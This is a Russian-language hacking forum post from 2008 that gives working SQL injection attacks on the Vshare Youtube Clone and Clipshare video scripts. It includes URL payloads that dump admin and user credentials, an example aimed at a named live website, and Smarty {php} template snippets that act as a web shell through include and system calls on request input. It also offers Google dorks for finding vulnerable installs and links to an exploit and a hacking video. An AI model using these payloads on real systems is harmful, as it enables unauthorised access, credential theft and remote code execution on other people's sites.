SQL инъекция в Vshare Youtube Clone и Clipshare

Discussion in 'Уязвимости' started by Macro, 12 Feb 2008.

  1. Macro

    Macro Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    552
    Likes Received:
    298
    Reputations:
    207
    По сути движок один и тот же, но немного переделанный.

    Имя админа
    group_posts.php?tid=-1+union+select+1,soption,3,4,svalue,6,7+from+sconfig+limit+1,1/*&gid=1

    Пароль админа
    group_posts.php?tid=-1+union+select+1,soption,3,4,svalue,6,7+from+sconfig+limit+3,1/*&gid=1

    Пример: http://www.tios.biz/group_posts.php?tid=-1+union+select+1,soption,3,4,svalue,6,7+from+sconfig+limit+3,1/*&gid=1

    Админка живет в подпапке /siteadmin/

    В Clipshare пароль по умолчанию не шифруется, в Vshare пароль в md5.
    Замечание: В версиях Clipshare новее 2.6 данные хранятся в файле конфигурации.

    Через админ-панель можно редактировать шаблоны страниц, шаблоны обрабатываются классом Smarty, а посему чтобы исполнить код через шаблон необходимо вписать его между тегами {php}{/php}
    Например, так:

    Code:
    {php}if(isset($_REQUEST[i]))include($_REQUEST[i]);{/php}
    {php}if(isset($_REQUEST[i]))system($_REQUEST[i]);{/php}
    
    Видео по взлому: http://blacktoad.info/ok/clipshare.rar
    P.S. видео немного лагает, но вроде все понятно.

    Багу нашел очень давно, выкладывать не хотел, видео изначально планировалось на конкурс видео, но потом все провалилось, т.к. на milworm выложили альтернативную sql инъекцию:

    Code:
    uprofile.php?UID=1+and+1=2+union+select+1,2,concat(uid,char(58),username,char(58),pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+signup+limit+0,20/*
    

    И эксплоит смены пароля юзеру

    http://milw0rm.com/exploits/download/4837


    Дорки:

    intext:Copyright © 2006-2007 ClipShare
    intext:Copyright © 2008 vShare Youtube Clone

    P.P.S форум ставит пробелы...
     
    #1 Macro, 12 Feb 2008
    Last edited: 12 Feb 2008
    5 people like this.
Loading...